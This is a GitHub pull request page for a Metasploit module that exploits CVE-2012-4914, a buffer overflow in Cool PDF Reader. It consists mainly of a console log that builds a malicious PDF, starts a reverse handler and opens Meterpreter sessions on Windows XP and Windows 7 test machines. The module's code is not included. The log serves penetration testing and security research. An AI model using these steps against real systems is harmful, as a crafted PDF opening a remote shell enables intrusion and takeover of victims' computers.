added module for cve-2012-4914 #1610

Merged
merged 2 commits into from Mar 19, 2013

jvazquez-r7 commented Mar 17, 2013

Tested on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1

vulnerable app can be downloaded from

http://www.exploit-db.com/wp-content/themes/exploit/applications/29e2770f70e2ee702d2d60658024d976-CoolPDFReader.exe

msf  exploit(handler) > use exploit/windows/fileformat/coolpdf_image_stream_bof 
msf  exploit(coolpdf_image_stream_bof) > rexploit
[*] Reloading module...

[+] msf.pdf stored at /Users/juan/.msf4/local/msf.pdf
msf  exploit(coolpdf_image_stream_bof) > use exploit/multi/handler 
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.136
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.136:1691) at 2013-03-17 21:09:39 +0100

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.136 - Meterpreter session 1 closed.  Reason: User exit
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.130
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.130:49255) at 2013-03-17 21:10:29 +0100

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...


zeroSteiner Mar 18, 2013

I don't think these lines are necessary.

jvazquez-r7 Mar 18, 2013

Owner

you're right, debug .... thanks ;)


@wchen-r7 wchen-r7 merged commit 4aab1cc into rapid7:master Mar 19, 2013

1 check passed

default The Travis build passed

@jvazquez-r7 jvazquez-r7 deleted the jvazquez-r7:coolpdf_image_stream_bof branch Nov 18, 2014
